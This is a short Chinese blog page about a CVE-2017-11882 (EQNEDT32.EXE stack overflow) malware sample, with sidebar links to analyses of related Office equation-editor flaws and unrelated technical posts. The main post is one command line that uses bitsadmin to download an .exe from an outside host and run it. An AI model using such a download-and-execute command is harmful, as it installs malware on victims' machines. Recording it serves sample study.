文档章节

cmd bat 下载并运行文件,来自cve-11882漏洞样本,eqnedit32.exe栈溢出

simpower
 simpower
发布于 08/15 13:11
字数 56
阅读 9
收藏 0

cmd.exe /c bitsadmin /transfer eH /priority foreground http://holdthatpaper33.com/abu_output774B940.exe %USERPROFILE%\cXUAQSZZXXCXzx.exe && start %USERPROFILE%\cXUAQSZZXXCXzx.exe

© 著作权归作者所有

共有 人打赏支持
simpower
粉丝 26
博文 564
码字总数 43779
作品 0
海淀
程序员
私信 提问
Office漏洞袭来(CVE-2018-0802)详细分析

  在windows2017年 11月份发布补丁,修复了包括cve-2017-11882在内之后,在2018年又继续发布补丁,修复了包括CVE-2018-0802在内的多个漏洞,而这次CVE-2018-0802再一次利用了EQNEDT32.EXE公...

FreeBuf
01/23
0
0
Office公式编辑器漏洞二代的原理分析、利用与防护方案

  在上周二(2018年1月9日)的微软例行更新中,微软再一次对Office中的公式编辑器3.0产生的多个内存破坏漏洞进行了修补,并将这一系列漏洞归类于编号CVE-2018-0802。   漏洞披露后,金睛安...

FreeBuf
01/20
0
0
一个二进制POC的诞生之旅CVE-2018-0802

  *本文作者:GeekOnline,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。   背景   在潜伏17年的“噩梦公式”漏洞(CVE-2017-11882)被曝光修补之后,之前的漏洞程序EQNEDT32.EXE在w...

FreeBuf
01/22
0
0
样本分析 | CVE-2017-11882、CVE-2018-0802漏洞组合远控木马

封面 前言 看到腾讯电脑管家在freebuf上发了一篇《NDAY漏洞CVE-2017-11882与0Day漏洞CVE-2018-0802漏洞组合传播远控木马的样本分析》,觉得这个样本很有学习意义。就根据这个样本,梳理了下相...

皆明
01/27
0
0
cve-0158,0199,8759,11882,11935

0158栈溢出 0199远程地址自动下载执行 8759 属于代码注入,虽然可以像0199一样利用,但是跟office无关,跟.net有关 CVE8759,该漏洞在.net库中的SOAP WSDL 解析模块IsValidUrl函数没有正确处...

simpower
08/03
0
0

没有更多内容

加载失败,请刷新页面

加载更多

sed, awk 练习

1. sed打印某行到某行之间的内容 2. sed 转换大小写 将单词首字母转化大写 将所有小写转化大写 3. sed 在某一行最后面添加一个数字 4. 删除某行到最后一行 解析: {:a;N;$!ba;d} :a : 是...

Fc丶
今天
2
0
babel6升级到7,jest-babel报错:Requires Babel "^7.0.0-0", but was loaded with "6.26.3".

自从将前端环境更新到babel7,jest-babel之前是基于babel6的,执行时候就会报:Requires Babel "^7.0.0-0", but was loaded with "6.26.3". 很烦,因为连续帮好几台电脑修复这个问题,所以记...

曾建凯
今天
1
0
探索802.11ax

802.11ax承诺在真实条件下改善峰值性能和最差情况。 如何改善今天的Wi-Fi? 在决定如何改进当前版本以外的Wi-Fi时,802.11ac,IEEE和Wi-Fi联盟调查了Wi-Fi部署和行为,以确定更广泛使用的障碍...

linuxprobe16
今天
2
0
使用linux将64G的SDCARD格式化为FAT32

一、命令如下: sudo fdisk -lsudo mkfs.vfat /dev/sda -Isudo fdisk /dev/sda Welcome to fdisk (util-linux 2.29.2). Changes will remain in memory only, until you decide to wri......

mbzhong
今天
4
0
深入理解Plasma(四):Plasma Cash

这一系列文章将围绕以太坊的二层扩容框架,介绍其基本运行原理,具体操作细节,安全性讨论以及未来研究方向等。本篇文章主要介绍在 Plasma 框架下的项目 Plasma Cash。 深入理解Plasma(1):...

HiBlock
昨天
1
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部